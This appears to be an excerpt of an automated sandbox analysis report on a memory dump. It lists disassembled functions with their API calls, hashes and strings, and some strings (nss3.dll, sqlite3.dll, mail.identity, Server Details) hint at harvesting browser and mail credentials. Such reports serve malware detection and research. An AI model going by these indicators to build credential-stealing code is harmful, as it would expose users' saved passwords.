                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _strcmpi
                                                                                                                                                                                                                                    • String ID: C@$mail.identity
                                                                                                                                                                                                                                    • API String ID: 1439213657-721921413
                                                                                                                                                                                                                                    • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                                                                                                                                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00406640
                                                                                                                                                                                                                                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$memset$memcmp
                                                                                                                                                                                                                                    • String ID: Ul@
                                                                                                                                                                                                                                    • API String ID: 270934217-715280498
                                                                                                                                                                                                                                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                                                                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75C50A60), ref: 00408EBE
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75C50A60), ref: 00408E31
                                                                                                                                                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 203655857-0
                                                                                                                                                                                                                                    • Opcode ID: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                                                                                                                                                                    • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _ultoasprintf
                                                                                                                                                                                                                                    • String ID: %s %s %s
                                                                                                                                                                                                                                    • API String ID: 432394123-3850900253
                                                                                                                                                                                                                                    • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                                                                                                                                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                                                                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                                                                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                                                                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                                                                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                                                    • String ID: menu_%d
                                                                                                                                                                                                                                    • API String ID: 1129539653-2417748251
                                                                                                                                                                                                                                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                                                                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _msizerealloc
                                                                                                                                                                                                                                    • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                                    • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                                    • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                                                                    • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                                                                                                                                                                                                                    • strrchr.MSVCRT ref: 00409808
                                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                                                    • String ID: _lng.ini
                                                                                                                                                                                                                                    • API String ID: 3334749609-1948609170
                                                                                                                                                                                                                                    • Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                                                                                                                                                    • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                                                    • String ID: sqlite3.dll
                                                                                                                                                                                                                                    • API String ID: 1983510840-1155512374
                                                                                                                                                                                                                                    • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                                                                                                                                                    • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LongWindow
                                                                                                                                                                                                                                    • String ID: MZ@
                                                                                                                                                                                                                                    • API String ID: 1378638983-2978689999
                                                                                                                                                                                                                                    • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                                                                                                                                                    • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: PrivateProfileString
                                                                                                                                                                                                                                    • String ID: A4@$Server Details
                                                                                                                                                                                                                                    • API String ID: 1096422788-4071850762
                                                                                                                                                                                                                                    • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                                                    • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                                                                    • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                                                    • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,7576E430,?,00000000), ref: 0040858F
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,7576E430,?,00000000), ref: 004085BA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3110682361-0
                                                                                                                                                                                                                                    • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                                                                                                                                                    • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3510742995-0
                                                                                                                                                                                                                                    • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                                    • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099A3
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099CC
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099ED
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 00409A0E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                                                                    • Opcode ID: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                                                                                                                                                                                                                    • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0040799A
                                                                                                                                                                                                                                      • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                                      • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,75C50A60,00407A43,00000001,?,00000000,75C50A60,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                                                                                                                                      • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                                    • free.MSVCRT ref: 004079BD
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,00000000,?,?,00407E04,?,00000000,?,?), ref: 004079DD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3669619086-0
                                                                                                                                                                                                                                    • Opcode ID: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                                                                                                                                                                    • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59